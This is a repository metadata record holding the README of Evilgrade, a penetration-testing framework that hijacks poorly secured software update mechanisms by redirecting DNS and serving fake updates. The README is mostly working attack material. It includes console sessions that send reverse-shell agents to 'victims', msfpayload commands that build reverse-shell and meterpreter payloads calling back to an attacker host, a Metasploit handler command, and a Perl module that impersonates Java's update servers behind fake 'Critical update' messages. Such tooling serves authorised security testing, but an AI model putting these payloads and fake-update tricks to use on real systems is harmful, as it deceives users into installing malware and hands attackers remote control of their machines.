{"id":13433254,"url":"https://github.com/infobyte/evilgrade","last_synced_at":"2025-05-16T06:06:58.296Z","repository":{"id":8178465,"uuid":"9603081","full_name":"infobyte/evilgrade","owner":"infobyte","description":"Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.","archived":false,"fork":false,"pushed_at":"2021-09-01T17:08:27.000Z","size":8071,"stargazers_count":1307,"open_issues_count":11,"forks_count":283,"subscribers_count":102,"default_branch":"master","last_synced_at":"2025-04-08T16:04:37.697Z","etag":null,"topics":["evilgrade","fake","mitm","payload","penetration","pentest","security","update"],"latest_commit_sha":null,"homepage":"https://www.faradaysec.com/","language":"Perl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/infobyte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2013-04-22T16:08:48.000Z","updated_at":"2025-04-02T03:17:12.000Z","dependencies_parsed_at":"2022-09-02T18:50:28.149Z","dependency_job_id":null,"html_url":"https://github.com/infobyte/evilgrade","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/infobyt
e","download_url":"https://codeload.github.com/infobyte/evilgrade/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254478190,"owners_count":22077676,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["evilgrade","fake","mitm","payload","penetration","pentest","security","update"],"created_at":"2024-07-31T02:01:23.160Z","updated_at":"2025-05-16T06:06:53.287Z","avatar_url":"https://github.com/infobyte.png","language":"Perl","funding_links":[],"categories":["Perl","Tools","Network Tools","Network","Tools:","Awesome Penetration Testing (\"https://github.com/Muhammd/Awesome-Pentest\")"],"sub_categories":["Network Tools","Proxies and Machine-in-the-Middle (MITM) Tools","Tools"],"readme":"\u003cp align=\"center\" \u003e\n  \u003ca href=\"https://www.faradaysec.com\" target=\"_blank\"\u003e\u003cimg src=\"https://1.bp.blogspot.com/-DHDtcxnAujs/Xp5TEcdoeeI/AAAAAAAASZQ/fbSKCoPnFjUwhbPN0bUQyIpSWnPKRMhZACNcBGAsYHQ/s1600/ad_kitploitadv6.png\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp align=\"center\" \u003e\n Faraday Security Research\n-- | ISR-evilgrade | www.faradaysec.com | --\n\u003c/p\u003e\n\n## .:: [BRIEF OVERVIEW] ::.\n\nEvilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.\nIt comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.\nEasy to set up new settings, and has an autoconfiguration when new binary agents are set.\n\n##### * When should I use 
evilgrade?\n\nThis framework comes into play when the attacker is able to make hostname redirections (manipulation of the victim's DNS traffic), which can be done in two scenarios:\n\n##### Internal scenario:\n- Internal DNS access\n- ARP spoofing\n- DNS Cache Poisoning\n- DHCP spoofing\n- TCP hijacking\n- Wi-Fi Access Point impersonation\n\n##### External scenario:\n- Internal DNS access\n- DNS Cache Poisoning\n\n##### * How does it work?\n\nEvilgrade works with modules; each module implements the structure needed to emulate a fake update for a specific application/system.\n\n##### * Which OSes are supported?\n\nISR-Evilgrade is cross-platform; it only depends on having an appropriate payload for the target platform to be exploited.\n\n#### Implemented modules:\n-------------------\n- Freerip 3.30\n- Jet photo 4.7.2\n- Teamviewer 5.1.9385\n- ISOpen 4.5.0\n- Istat.\n- Gom 2.1.25.5015\n- Atube catcher 1.0.300\n- Vidbox 7.5\n- Ccleaner 2.30.1130\n- Fcleaner 1.2.9.409\n- Allmynotes 1.26\n- Notepad++ 5.8.2\n- Java 1.6.0_22  winxp/win7\n- aMSN 0.98.3\n- Appleupdate \u003c= 2.1.1.116 ( Safari 5.0.2 7533.18.5, \u003c= Itunes 10.0.1.22, \u003c= Quicktime 7.6.8 1675)\n- Mirc 7.14\n- Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)\n- Dap 9.5.0.3\n- Winscp 4.2.9\n- AutoIt Script 3.3.6.1\n- Clamwin 0.96.0.1\n- AppTapp Installer 3.11 (Iphone/Itunes)\n- getjar (facebook.com)\n- Google Analytics Javascript injection\n- Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8\n- Winamp 5.581\n- TechTracker (cnet) 1.3.1 (Build 55)\n- Nokiasoftware firmware update 2.4.8es - (Windows software)\n- Nokia firmware v20.2.011\n- BSplayer 2.53.1034\n- Apt ( \u003c Ubuntu 10.04 LTS)\n- Ubertwitter 4.6 (0.971)\n- Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45\n- Cpan 1.9402\n- VirtualBox (3.2.8 )\n- Express talk\n- Filezilla\n- Flashget\n- Miranda\n- Orbit\n- Photoscape.\n- Panda Antirootkit\n- Skype\n- Sunbelt\n- 
Superantispyware\n- Trillian \u003c= 5.0.0.26\n- Adium 1.3.10 (Sparkle Framework)\n- VMware\n- more...\n\n\n* /docs/CHANGES\n\n## .:: [MAIN USAGE] ::.\n\nIt works similar to an IOS console\n```\nevilgrade\u003ehelp\nType 'help command' for more detailed help on a command.\n  Commands:\n    configure - Configure \u003cmodule-name\u003e - no help available\n    exit      - exits the program\n    help      - prints this screen, or help on 'command'\n    reload    - Reload to update all the modules - no help available\n    restart   - Restart webserver - no help available\n    set       - Configure variables - no help available\n    show      - Display information of \u003cobject\u003e.\n    start     - Start webserver - no help available\n    status    - Get webserver status - no help available\n    stop      - Stop webserver - no help available\n    version   - Display framework version. - no help available\n\n  Object:\n     options  - Show options of current module.\n     vhosts   - Show VirtualHosts of current module.\n     modules  - List all modules available for use.\n     active   - Show active modules.\n```\n\n## List implemented modules\n``` console\nevilgrade\u003eshow modules\n\nList of modules:\n===============\n\n...\n...\n...\n\n- 63 modules available.\n```\n#### Configure a specified module\n``` console\nevilgrade\u003econf sunjava\nevilgrade(sunjava)\u003e\n\n```\n\n#### Show all VirtualHosts.\n#### VirtualHost field contains the domains that our webserver is going to emulate for us.\n``` console\nevilgrade\u003eshow vhosts\n\nVirtual hosts:\n=============\n\n[\n  \"java.sun.com\",\n  \"javadl-esd.sun.com\",\n  ...\n  ...\n  ...\n]\n```\n\n#### Show options of current module.\n#### agent: This is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation (see ADVANCED).\n``` console\nevilgrade(sunjava)\u003eshow options\n\nDisplay options:\n===============\n\nName = Sun Microsystems 
Java\nVersion = 2.0\nAuthor = [\"Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e\"]\nDescription = \"\"\nVirtualHost = \"java.sun.com|javadl-esd.sun.com\"\n\n.-------------------------------------------------------------------------------------------------------------------------.\n| Name         | Default                                         | Description                                            |\n+--------------+-------------------------------------------------+--------------------------------------------------------+\n| website      | http://java.com/moreinfolink                    | Website displayed in the update                        |\n| enable       |                                               1 | Status                                                 |\n| atitle       | Critical vulnerability                          | Title name to be displayed in the systray item popup   |\n| arg          |                                                 | Arg passed to Agent                                    |\n| adescription | This critical update fix internal vulnerability | Description  to be displayed in the systray item popup |\n| description  | This critical update fix internal vulnerability | Description to be displayed during the update          |\n| agent        | ./agent/reverseshellsign.exe                    | Agent to inject                                        |\n| title        | Critical update                                 | Title name displayed in the update                     |\n'--------------+-------------------------------------------------+--------------------------------------------------------'\n```\n#### Start services (DNS Server and WebServer)\n``` console\nevilgrade\u003estart\nevilgrade\u003e\n[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...\nevilgrade\u003e\n[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. 
Waiting for Connections ...\n```\n\n#### Waiting for victims\n``` console\nevilgrade\u003e\n[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: \"^/update/[.\\\\d]+/map\\\\-[.\\\\d]+.xml\"\nevilgrade\u003e\n[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: \"^/java_update.xml\\$\"\nevilgrade\u003e\n[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: \".exe\"\nevilgrade\u003e\n[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: \"./agent/reverseshell.exe\"\n```\n#### Show status and victims logs\n``` console\nevilgrade\u003eshow status\nWebserver (pid 4134) already running\n\nUsers status:\n============\n\n.---------------------------------------------------------------------------------------------------------------.\n| Client         | Module           | Status | Md5,Cmd,File                                                     |\n+----------------+------------------+--------+------------------------------------------------------------------+\n| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',\"./agent/reverseshell.exe\"   |\n'----------------+------------------+--------+------------------------------------------------------------------'\n```\n\n## .:: [DEEP USAGE] ::.\n\n### Commands\n#### configure / conf - Configure \u003cmodule-name\u003e\n\nExample:\n-------\n``` console\nevilgrade\u003econfigure sunjava\nevilgrade(sunjava)\u003e\n\nevilgrade\u003econf sunjava\nevilgrade(sunjava)\u003e\n\n## 'conf' takes us back to the global configuration\nevilgrade(sunjava)\u003econf\nevilgrade\u003e\n\n\n##\nreload    - Reload to get all modules update (to refresh loaded modules, useful on development)\nstart     - Start webserver\nstop      - Stop webserver (fake update server)\n```\n\n\nExample:\n-------\n``` console\nevilgrade\u003estart\nevilgrade\u003e\n[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. 
Waiting for connections ...\nevilgrade\u003e\n[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...\n\n\n#######################################\n\n\n\nExample:\n-------\nevilgrade\u003estop\nStopping WEBSERVER  [OK]\nStopping DNSSERVER  [OK]\n\n#######################################\n\nrestart   - Restart services (WebServer and DNS Server)\nstops and starts again\n\n#######################################\n\nstatus    - Get webserver and victims status\n\nExample:\n-------\nevilgrade\u003eshow status\nWebserver (pid 4134) already running\n\nUsers status:\n============\n\n.---------------------------------------------------------------------------------------------------------------.\n| Client         | Module           | Status | Md5,Cmd,File                                                     |\n+----------------+------------------+--------+------------------------------------------------------------------+\n| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',\"./agent/reverseshell.exe\"   |\n'----------------+------------------+--------+------------------------------------------------------------------'\n\n#######################################\n\nshow      - Display information of \u003cobject\u003e.\n\n#######################################\n\nshow active    - Display active modules in the webserver\n\n#######################################\n\nshow modules    - Display implemented modules\n\n#########################################\n\nshow options    - Display modules/global options\n\nExample:\n-------\n\nevilgrade\u003eshow options\n\nDisplay options:\n===============\n\n.-----------------------------------------------------------------------------------.\n| Name        | Default   | Description                                             |\n+-------------+-----------+---------------------------------------------------------+\n| DNSEnable   |         1 | Enable DNS Server ( handle virtual 
request on modules ) |\n| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |\n| DNSPort     |        53 | Listen Name Server port                                 |\n| debug       |         1 | Debug mode                                              |\n| port        |        80 | Webserver listening port                                |\n| sslport     |       443 | Webserver SSL listening port                            |\n'-------------+-----------+---------------------------------------------------------'\n\nevilgrade\u003e\nevilgrade(notepadplus)\u003econf vmware\nevilgrade(vmware)\u003eshow options (without started services)\n\nDisplay options:\n===============\n\nName = VMware Server\nVersion = 1.0\nAuthor = [\"Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e\"]\nDescription = \"\"\nVirtualHost = \"www.vmware.com\"\n\n.----------------------------------------------.\n| Name   | Default           | Description     |\n+--------+-------------------+-----------------+\n| enable |                 1 | Status          |\n| agent  | ./agent/agent.exe | Agent to inject |\n'--------+-------------------+-----------------'\n\nevilgrade(vmware)\u003eshow options (with started services after setting agent)\n\nDisplay options:\n===============\n\nName = VMware Server\nVersion = 1.0\nAuthor = [\"Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e\"]\nDescription = \"\"\nVirtualHost = \"www.vmware.com\"\n\n.--------------------------------------------------------------------------------------------------.\n| Name        | Default                                                          | Description     |\n+-------------+------------------------------------------------------------------+-----------------+\n| enable      |                                                                1 | Status          |\n| agentmd5    | f80af637642170507bda998b6f2015fa                                 |                 |\n| agentsize   |          
                                                  54576 |                 |\n| agent       | ./agent/agent.exe                                                | Agent to inject |\n| agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd |                 |\n'-------------+------------------------------------------------------------------+-----------------'\n\n\n#########################################\n\nset       - Configure variables global or modules\n\nExample:\n-------\n\nevilgrade\u003eshow options\n\n\nDisplay options:\n===============\n\n.-----------------------------------------------------------------------------------.\n| Name        | Default   | Description                                             |\n+-------------+-----------+---------------------------------------------------------+\n| DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |\n| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |\n| DNSPort     |        53 | Listen Name Server port                                 |\n| debug       |         0 | Debug mode                                              |\n| port        |        80 | Webserver listening port                                |\n| sslport     |       443 | Webserver SSL listening port                            |\n'-------------+-----------+---------------------------------------------------------'\n\n###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)\n\nevilgrade\u003eset debug 1 #Enable debug\nset debug, 1\n\nevilgrade\u003eset DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening\nset DNSAnswerIp, 192.168.1.4\n\nevilgrade\u003eshow options\n\nDisplay options:\n===============\n\n.-------------------------------------------------------------------------------------.\n| Name        | Default     | Description                                             
|\n+-------------+-------------+---------------------------------------------------------+\n| DNSEnable   |           1 | Enable DNS Server ( handle virtual request on modules ) |\n| DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip  )                                  |\n| DNSPort     |          53 | Listen Name Server port                                 |\n| debug       |           1 | Debug mode                                              |\n| port        |          80 | Webserver listening port                                |\n| sslport     |         443 | Webserver SSL listening port                            |\n'-------------+-------------+---------------------------------------------------------'\n\n\n###############################\n\nexit      - exits the program\n\n#######################################\n\nhelp      - prints this screen, or help on 'command'\n\n#######################################\n\n```\n\n## .:: [ADVANCED] ::.\n\n- Modules Options:\nEach module has special options, but the \"agent\" field is always present.\nThe agent is our fake update binary; we either set the path to where it is located or implement dynamic fake update binary generation.\n\n[Dynamic fake update binary] allows the execution of an external command to generate our binary, for example using msfpayload from the Metasploit Framework.\nWith this feature we can generate any Metasploit payload or use an external interface to create the binary.\n\n# Example 1:\n```\nevilgrade(sunjava)\u003eset agent '[\"/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X \u003e \u003c%OUT%\u003e/tmp/a.exe\u003c%OUT%\u003e\"]'\n```\n\nIn this case, for every requested update binary we generate a fake update binary with the payload \"windows/shell_reverse_tcp\",\na reverse shell that connects to address 192.168.233.2, port 4141.\nThe label \u003c%OUT%\u003e\u003c%OUT%\u003e is a special tag that marks where the output binary is going to be generated.\nEvilgrade 
detects use of the \"dynamic fake update binary\" feature when the value is an expression between square brackets '[]'.\nInside those brackets is a string enclosed in double quotes \"\", which is compiled using Perl.\n\nFor example if we use:\n```\nevilgrade(sunjava)\u003eset agent '[\"./generatebin -o \u003c%OUT%\u003e/tmp/update\".int(rand(256)).\".exe\u003c%OUT%\u003e\"]'\n```\nthen every time we get a binary request, evilgrade will compile the line and execute the final string \"./generatebin -o /tmp/update(random).exe\",\ngenerating different agents.\n\n\nAn easy alternative, though not dynamic, is to generate the payload directly with msfpayload in a terminal and assign it manually in the module's configuration.\n\n# Example 2:\n\n(Outside evilgrade)\n```\n[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X \u003e /tmp/reverse-shell.exe\n```\n\n(Inside evilgrade)\n```\nevilgrade(sunjava)\u003eset agent /tmp/reverse-shell.exe\n```\n\nAfter the payload is generated, we leave a multi handler listening on the previously assigned LHOST.\n\n(Outside evilgrade)\n```\n[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E\n[*] Started reverse handler on 192.168.100.2:4444\n[*] Starting the payload handler...\n```\n\n## .:: [MODULE DEVELOPMENT] ::.\n\nModule development is very simple. 
Since evilgrade is based on modules, you just have to use a package .pm (perl module).\nIn this case we are going to describe the sunjava update module (comments with #):\n\n``` perl\npackage modules::sunjava;\n\nuse strict;\nuse Data::Dump qw(dump);\n\nmy $base=\n{\n    'name' =\u003e 'Sun Microsystems Java', #name of the module to display in the framework\n    'version' =\u003e '2.0', #internal module version\n    'appver' =\u003e '\u003c= 1.6.0_22', #last application version tested with this evilgrade module\n    'author' =\u003e [ 'Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e' ], #author\n    'description' =\u003e qq{}, #brief description\n    'vh' =\u003e '(java.sun.com|javadl-esd.sun.com)', #VirtualHosts that the application uses to retrieve information about the update configuration files and update binaries.\n\n    #Then we have the request object's collection\n    'request' =\u003e [\n    #Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com)\n        {\n        'req' =\u003e '(/update/[.\\d]+/map\\-[.\\d]+.xml|/update/1.6.0/map\\-m\\-1.6.0.xml)', #The required URL, regex friendly\n        'type' =\u003e 'file', #it's the response type (file|string|agent|install)\n         #we can use:\n                      #file: response with content file referenced in the \"file\" option below (./include/sunjava_map.xml)\n                      #string: response with a string referenced in the \"string\" options below\n                      #agent:  response with content file referenced in the \"agent\" options (options section)\n                      #install: response with content file referenced in the \"file\" option below\n                        #It's used to know if the fake update was executed\n                        #In some update process we can specify a final page after update installed\n                        #so we send to a controller page.\n        'method' =\u003e '', #not implemented 
yet\n        'bin'    =\u003e '', #set to 1 if we are going to send a binary file\n        'string' =\u003e '', #if we have chosen the 'type' string then in this variable we set the response\n        'parse' =\u003e '', #set to 1 if the file or string need be parsed with options\n        'file' =\u003e './include/sunjava/sunjava_map.xml'\n        },\n\n        {\n        'req' =\u003e '^/java_update.xml$', #regex friendly\n        'type' =\u003e 'file', #file|string|agent|install\n        'method' =\u003e '', #any\n        'bin'    =\u003e '',\n        'string' =\u003e '',\n        'parse' =\u003e '1',\n        'file' =\u003e './include/sunjava/sunjava_update.xml'\n        },\n        {\n        'req' =\u003e '/x.jnlp', #regex friendly\n        'type' =\u003e 'file', #file|string|agent|install\n        'method' =\u003e '', #any\n        'bin'    =\u003e '',\n        'string' =\u003e '',\n        #In this case we parse the file\n                    'parse' =\u003e '1',\n        #To parse the file we use special tags, like \u003c%OPTIONAME%\u003e inside the \"file\" or \"string\" field\n              #This tags are replaced with the values of the options, for example\n              #\u003c%TITLE%\u003e will be replaced by 'Critical update'\n        'file' =\u003e './include/sunjava/x.jnlp'\n        },\n        {\n        'req' =\u003e '.jar', #regex friendly\n        'type' =\u003e 'file', #file|string|agent|install\n        'method' =\u003e '', #any\n        'bin'    =\u003e 1,\n        'string' =\u003e '',\n        'parse' =\u003e '',\n        'file' =\u003e './include/sunjava/JavaPayload/FunnyClass2.jar'\n        },\n\n        {\n        'req' =\u003e '.exe', #regex friendly\n        'type' =\u003e 'agent', #Here we have an agent type with a binary response\n        'bin'    =\u003e 1,\n        'method' =\u003e '', #any\n        'string' =\u003e '',\n        'parse' =\u003e '',\n        'file' =\u003e ''\n        }\n    ],\n\n    #Options\n    #Here we have the 
options that will be displayed with \"show options\" inside the current module.\n    #This options are used to parse the string or a file using in the responses\n    'options' =\u003e {  'agent'  =\u003e { 'val' =\u003e './agent/java/javaws.exe', #The default value\n              'desc' =\u003e 'Agent to inject'}, #Brief description\n        'arg'    =\u003e { 'val' =\u003e 'http://java.sun.com/x.jnlp\"',\n              'desc' =\u003e 'Arg passed to Agent'},\n        'enable' =\u003e { 'val' =\u003e 1,\n              'desc' =\u003e 'Status'},\n\n    #The following is a dynamic hidden option,\n    #In this case we use the tag \u003c%NAME%\u003e to parse the files and execute perl functions to get randoms values\n    #You can use whatever you like in perl, if you're wishing to use more functions check \"isrcore/utils.pm\"\n                    'name'  =\u003e { 'val' =\u003e \"'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))\",\n                                'hidden' =\u003e 1,\n                          'dynamic' =\u003e1,},\n\n    #All the options depend on the update process. 
You have to research the possible variables and implement them in your module\n    #These are the most common update messages, webpages, descriptions, popup messages, title, etc\n        'title'  =\u003e { 'val' =\u003e 'Critical update',\n              'desc' =\u003e 'Title name displayed in the update'},\n        'description' =\u003e { 'val' =\u003e 'This critical update fix internal vulnerability',\n          'desc' =\u003e 'Description to be displayed during the update'},\n        'atitle'  =\u003e { 'val' =\u003e 'Critical vulnerability',\n               'desc' =\u003e 'Title name to be displayed in the systray item popup'},\n        'adescription' =\u003e { 'val' =\u003e 'This critical update fix internal vulnerability',\n          'desc' =\u003e 'Description  to be displayed in the systray item popup'},\n        'website' =\u003e { 'val' =\u003e 'http://java.com/moreinfolink',\n               'desc' =\u003e 'Website displayed in the update'}\n     }\n};\n```\n\n## .:: [TIPS] ::.\n\n1) Don't forget to run evilgrade with a user that has privileges to create listening sockets,\notherwise you won't be able to use evilgrade's Services.\n\n2) Every time you modify a module while evilgrade is running, don't forget to 'reload' the modules.\n\n3) Set the binary 'agents' before starting services because there are some fields that evilgrade\nwill fill out for you (agentmd5, agentsha256, and agentsize), which can't be done while the services are already running.\n\n4) If you're using a dynamic response with variables such as: \u003c%AGENTSIZE%\u003e, \u003c%AGENTMD5%\u003e, \u003c%URL\\_FILE%\u003e, \u003c%URL\\_FILE\\_EXT%\u003e, or custom ones defined at the options section, don't forget to set *parse* to 1.\n\n5) The same goes for injecting an agent: you must set the *bin* flag to 1.\n\n6) If you want to make plaintext responses using HTTP use the *cheader* flag. 
Example below:\n```\n        {   'req' =\u003e '/sitepath/download/file.zip'\n            ,    #regex friendly\n            'type'    =\u003e 'string',                  #file|string|agent|install\n            'method'  =\u003e '',                        #any\n            'bin'     =\u003e '',\n            'string'  =\u003e '',\n            'parse'   =\u003e '1',\n            'file'    =\u003e '',\n            'cheader' =\u003e \"HTTP/1.1 302 Found\\r\\n\"\n                . \"Location: http://sitedomain.com/\u003c%URL_FILE%\u003e.exe \\r\\n\"\n                . \"Content-Length: 0 \\r\\n\"\n                . \"Connection: close \\r\\n\\r\\n\",\n        },\n```\n\n7) To filter by User-Agent, use the Sparkle2 module as an example. In base add 'useragent' =\u003e 'true', and in a request use the 'useragent' field as you would the 'req' field, but matching user agents. Note that this field already has \"User-Agent: \" stripped.\n\n## .:: [REQUIREMENTS] ::.\n\n### Perl Modules\n```\n    Data::Dump\n    Digest::MD5\n    Time::HiRes\n    RPC::XML\n```\n\n## .:: [MORE INFORMATION] ::.\n\nThis framework was presented in the following security conferences:\n\n```\n· ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]\n· Troopers 2008 [Munich, Germany] [www.troopers08.org]\n· Shakacon 2008 [Hawaii, USA] [www.shakacon.org]\n· H2HC 2009 [Brazil] [www.h2hc.com.br]\n· Blackhat Arsenal \u0026 Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]\n```\n\n\n## .:: [AUTHOR] ::.\n\nFrancisco Amato\nfamato+at+faradaysec+dot+com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fevilgrade","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finfobyte%2Fevilgrade","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fevilgrade/lists"}